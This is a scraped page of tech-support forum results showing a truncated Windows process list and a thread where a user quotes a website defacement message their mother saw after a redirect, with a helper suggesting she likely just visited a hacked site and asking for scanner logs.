C:\WINDOWS\system32\lsass.exe
C:\WINDOWS\system32\Ati2evxx.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\System32\svchost.exe
C:\Program Files\Ahead\InCD\InCDsrv.exe
C:\WINDOWS\system32\Ati2evxx.exe
C:\WINDOWS\system32\spoolsv.exe
C:\Program Files\Common Files\Symantec Shared\ccEvtMgr.exe
C:\WINDOWS\Explorer.EXE
C:\Program Files\Common Files\Symantec Shared\ccApp.exe
C:\Program Files\Analog Devices\SoundMAX\SMax4PNP.... Read more

Answer:Hacked??????

10 more replies
Relevance 58.22%

My mom, who isn't net savy, was searching through Google when she clicked this link that re-directed her to this site that said:

#SYSTEM FAILURE#

Your security has been passed by...
k0rbika

U have a bug in your system admin

HACKED

Muslims are coming

[k0rbika was here]

Iam not sorry admin, your site has been hacked by me.

____

I'm really freaked by this, what should I do?

Answer:Help! I think I Might Have Gotten Hacked

Hello and welcome to TSF.

Sorry for the delayed response. She may have just visited a hacked site, but if you are worried that the system may have been infected, please follow the instructions in IMPORTANT - Read This Before Posting A Log and post the two text files, main.txt and extra.txt produced by the Deckard's System Scanner.

1 more replies